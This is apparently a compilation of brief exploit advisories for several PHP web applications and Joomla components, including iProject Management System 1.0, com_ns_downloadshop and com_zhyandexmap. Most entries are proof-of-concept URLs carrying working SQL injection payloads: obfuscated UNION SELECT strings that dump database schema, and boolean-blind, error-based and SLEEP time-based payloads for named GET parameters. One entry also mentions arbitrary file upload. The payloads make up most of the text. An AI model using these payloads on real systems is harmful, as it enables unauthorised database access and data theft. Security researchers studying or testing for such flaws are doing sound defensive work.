The vulnerability allows an users to inject sql commands into the iProject Management System 1.0 application.
The vulnerability allows an users upload arbitrary file to the web server.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/browse-scategory.php?sc=[SQL] -12c4ca4238a0b923820dcc509a6f75849b'++/*!08888UNIoN*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,(/*!08888SElEct*/+Export_sEt(5,@:=0,(/*!08888sElEct*/+count(*)/*!08888from*/(information_schEma.columns)whErE@:=Export_sEt(5,Export_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888column_namE*/,0xa3a,2)),@,2)),0x283829,0x283929,0x28313029)--+- http://localhost/[PATH]/service-provider.php?ser=[SQL] -9553'++/*!50000UNION*/+/*!50000SELECT*/+1,2,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- Parameter: sc (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sc=12c4ca4238a0b923820dcc509a6f75849b' AND 5747=5747 AND 'tzJH'='tzJH Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: sc=-5921' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7a71,0x74624c4f7167546e4676635467647269456244634147776d584b77796e4870674661646a7a44485a,0x717a6a7a71),NULL,NULL,NULL-- bjaB
The vulnerability allows an attacker to inject sql commands. An attacker can send a malicious payload to the 'nice_theme' parameter to execute a boolean-based blind or AND/OR time-based blind attack. The payloads can be 'nice_theme=2 AND 9686=9686' or 'nice_theme=2 AND SLEEP(5)'.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?option=com_ns_downloadshop&task=invoice.create&id=[SQL] Parameter: id (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT (CASE WHEN (5078=5078) THEN 5078 ELSE 5078*(SELECT 5078 FROM INFORMATION_SCHEMA.PLUGINS) END)) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT 2458 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2458=2458,1))),0x7178627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=[SQL] Parameter: placemarklistid (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-8164) OR 5013=5013# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-1660) OR 1 GROUP BY CONCAT(0x71627a7871,(SELECT (CASE WHEN (6691=6691) THEN 1 ELSE 0 END)),0x716b7a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
The vulnerability allows an users to inject sql commands. Proof of Concept: http://localhost/[PATH]/admin/users/?sort=login&edit=[SQL] -2'++/*!03333UNION*/(/*!03333SELECT*/0x283129,0x283229,0x283329,/*!03333CONCAT_WS*/(0x203a20,USER()),0x283529,/*!03333CONCAT_WS*/(0x203a20,DATABASE()),/*!03333CONCAT_WS*/(0x203a20,VERSION()),0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429)--+- http://localhost/[PATH]/admin/template/?edit=[SQL]
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/phpsqlsearch_genxml.php?subcategory=[SQL] 1'++aND(/*!09999sELeCT*/+0x30783331+/*!09999FrOM*/+(/*!09999SeLeCT*/+cOUNT(*),/*!09999CoNCaT*/((sELEcT(sELECT+/*!09999CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''=' Parameter: subcategory (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: subcategory=1' RLIKE (SELECT (CASE WHEN (9811=9811) THEN 1 ELSE 0x28 END))-- gzxz Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: subcategory=1' AND (SELECT 1213 FROM(SELECT COUNT(*),CONCAT(0x7162626a71,(SELECT (ELT(1213=1213,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qHTp Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: subcategory=1' OR SLEEP(5)-- RvzR
The vulnerability allows an attacker to inject sql commands into the vulnerable parameters of the application. The vulnerable parameters are search/tag, friends/index, users/profile and video_catalog/category. The payloads used for exploiting the vulnerability are AND boolean-based blind - WHERE or HAVING clause, MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR), MySQL >= 5.0.12 AND time-based blind and Generic UNION query (NULL) - 3 columns.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?page=news&nid=[SQL] Parameter: cat (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT) Payload: cat=1' OR NOT 6616=6616# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: cat=1' OR SLEEP(5)-- cCQQ
Services By CQR